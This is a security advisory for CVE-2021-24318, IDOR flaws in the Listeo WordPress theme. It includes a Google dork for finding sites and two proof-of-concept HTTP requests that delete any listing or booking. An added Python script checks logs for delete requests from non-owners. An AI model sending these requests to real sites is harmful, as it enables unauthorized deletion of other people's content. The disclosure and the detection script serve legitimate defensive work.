/*!
- # VULNERABILITY: Listeo WordPress Theme <= 1.6.10 - Multiple Authenticated IDOR Vulnerabilities
- # GOOGLE DORK: inurl:/wp-content/themes/listeo/
- # DATE: 2021-02-10
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Purethemes [ https://purethemes.net ]
- # SOFTWARE VERSION: <= 1.6.10
- # SOFTWARE LINK: https://themeforest.net/item/listeo-directory-listings-wordpress-theme/23239259
- # CVSS: Multiple
- # CWE: CWE-639
- # CVE: CVE-2021-24318
*/

### -- [ Info: ]

[i] Multiple Authenticated IDOR vulnerabilities were discovered in the Listeo theme through v1.6.10 for WordPress.

[i] Plugin(s) affected: Listeo Core by Purethemes [ https://purethemes.net ].

### -- [ Vulnerabilities: ]

[x] Authenticated IDOR | Post/page deletion: /my-properties/?action=delete&property_id=&_wpnonce=.

[x] Authenticated IDOR | Booking deletion: action=listeo_bookings_manage&booking_id=&status=deleted.

### -- [ Impact: ]

[~] Possibility to remove any content from the targeted website, up to the complete erasure of all content.

### -- [ CVSS 3.1: ]

[%] Authenticated IDOR | Post/page deletion: AV:N/AC:L/PR:L/UI:R/S:U

[%] Authenticated IDOR | Booking deletion: AV:N/AC:L/PR:L/UI:R/S:U

### -- [ PoC #1 | Authenticated IDOR | Permanent post/page deletion: ]

[!] https://listeo.pro/my-listings/?status=pending&action=delete&listing_id=13&_wpnonce=88a432b100

[!] GET /my-listings/?action=delete&listing_id=13&_wpnonce=88a432b100 HTTP/1.1
Host: listeo.pro
Cookie: [user cookies]

### -- [ PoC #2 | Authenticated IDOR | Permanent booking deletion: ]

[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: listeo.pro
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: [user cookies]

action=listeo_bookings_manage&booking_id=13&status=deleted

### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze
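
A log-review check for the two delete request shapes in this advisory, as an added example (not part of the original advisory and not the vendor's code): it flags delete requests where the authenticated user is not the owner of the referenced object. The record format, user ids, nonce values and ownership maps are constructed assumptions; in practice they would come from an audit log that records the session user and request body, and from the site's database.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed data (assumption): object id -> id of the user entitled to delete it.
LISTING_OWNER = {13: 2, 14: 7}
BOOKING_OWNER = {13: 2, 21: 7}
# Constructed audit records (assumption): authenticated user id plus the request.
AJAX = "/wp-admin/admin-ajax.php"
SAMPLE = [
    {"user_id": 2, "method": "GET", "url": "/my-listings/?action=delete&listing_id=13&_wpnonce=0000000000"},
    {"user_id": 5, "method": "GET", "url": "/my-listings/?status=pending&action=delete&listing_id=14&_wpnonce=0000000000"},
    {"user_id": 5, "method": "POST", "url": AJAX, "body": "action=listeo_bookings_manage&booking_id=13&status=deleted"},
    {"user_id": 7, "method": "POST", "url": AJAX, "body": "action=listeo_bookings_manage&booking_id=21&status=deleted"},
    {"user_id": 5, "method": "GET", "url": "/my-listings/?status=pending"},
]

def _params(encoded):
    # PHP keeps the last value of a repeated parameter, so do the same here.
    return {k: v[-1] for k, v in parse_qs(encoded).items()}

def delete_target(method, url, body=""):
    """Return ("listing" | "booking", id) if the request matches one of the
    advisory's two delete shapes, otherwise None."""
    parts = urlsplit(url)
    query = _params(parts.query)
    if method == "GET" and query.get("action") == "delete":
        oid = query.get("listing_id") or query.get("property_id")
        if oid and oid.isdecimal():
            return ("listing", int(oid))
    if method == "POST" and parts.path.endswith("/admin-ajax.php"):
        form = _params(body)
        if (form.get("action") == "listeo_bookings_manage"
                and form.get("status") == "deleted"
                and form.get("booking_id", "").isdecimal()):
            return ("booking", int(form["booking_id"]))
    return None

def cross_owner_deletes(records, listing_owner, booking_owner):
    """List (user_id, kind, object_id, owner_id) for every delete request sent
    by someone other than the owner. An unknown owner (None) is also reported,
    since the object may already be gone."""
    findings = []
    for rec in records:
        hit = delete_target(rec["method"], rec["url"], rec.get("body", ""))
        if hit is None:
            continue
        kind, oid = hit
        owner = (listing_owner if kind == "listing" else booking_owner).get(oid)
        if owner != rec["user_id"]:
            findings.append((rec["user_id"], kind, oid, owner))
    return findings
```

The same owner-versus-requester comparison is what the server-side handlers need to enforce before deleting; a valid nonce only proves the request came from the user's own session, not that the object belongs to them.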